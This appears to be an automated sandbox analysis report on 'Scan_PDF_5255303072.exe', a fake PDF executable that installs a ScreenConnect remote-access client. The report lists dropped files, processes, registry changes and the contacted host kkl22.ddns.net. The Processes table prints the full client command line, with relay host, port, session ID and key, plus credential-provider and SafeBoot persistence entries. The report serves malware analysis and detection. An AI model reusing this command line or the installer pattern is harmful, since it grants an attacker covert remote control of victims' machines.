Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Scan_PDF_5255303072.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Config.Msi\4a71ed.rbs
|
data
|
modified
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config
|
XML 1.0 document, ASCII text, with very long lines (456), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\CustomAction.config
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {98FA6172-4354-E89C-196A-00A1A1714F7D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\4a71ec.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {98FA6172-4354-E89C-196A-00A1A1714F7D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\4a71ee.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {98FA6172-4354-E89C-196A-00A1A1714F7D}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\MSI74E9.tmp
|
data
|
dropped
|
||
|
C:\Windows\Installer\MSI74FA.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\MSI7A98.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\SourceHash{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\{98FA6172-4354-E89C-196A-00A1A1714F7D}\DefaultIcon
|
MS Windows icon resource - 3 icons, 16x16, 4 bits/pixel, 32x32, 4 bits/pixel
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\gquftksg.newcfg
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\user.config (copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Temp\~DF109DA034B3B58F4F.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF3713049743B9F7B5.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF4A8BDEAA01C1D394.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF50D04C29ACB081F6.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF7BD5C710B8CAD368.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF94FEFF45E43A63A2.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF9BAADFF6153A7DAF.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFA7AAD57C5F4B08B7.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DFB117219955E9650B.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFB7271802BB284AAB.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFD9359BF3A701738F.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DFDB667FB809A68E37.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
There are 44 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Scan_PDF_5255303072.exe
|
"C:\Users\user\Desktop\Scan_PDF_5255303072.exe"
|
|
|
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9"
"User"
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c"
"System"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E C
|
||
|
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3A
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://wixtoolset.org/releases/
|
unknown
|
||
|
http://wixtoolset.org/news/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
|
unknown
|
||
|
https://feedback.screenconnect.com/Feedback.axd
|
unknown
|
||
|
https://docs.rs/getrandom#nodejs-es-module-support
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
kkl22.ddns.net
|
188.119.113.59
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.119.113.59
|
kkl22.ddns.net
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
|
Authentication Packages
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Config.Msi\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\4a71ed.rbs
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\4a71ed.rbsLow
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ECA6CD7F99528C9229C5B5A3CC99D4F1
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5283F57ED5163C6A818A8A1161EBB1A2
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B06603D19278B80B5232D336168F335F
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A1F4DF55221E9D239E861E9AB278A4A9
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E9DED4CDF5ACF58864B7AC15417DF1D
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\14AA0CD5258905F0D6FD710F28596A13
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\195432AE4E1CE7DEDD30F3C30EC54D0E
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa
|
URL Protocol
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa
|
UseOriginalUrlEncoding
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (e6cb77284cf765aa)
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32
|
ThreadingModel
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
LocalPackage
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\InstallProperties
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{98FA6172-4354-E89C-196A-00A1A1714F7D}
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\2716AF894534C98E91A6001A1A17F4D7
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\Features
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Windows\Installer\{98FA6172-4354-E89C-196A-00A1A1714F7D}\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2716AF894534C98E91A6001A1A17F4D7\Patches
|
AllPatches
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
ProductName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
PackageCode
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
Language
|
||
|
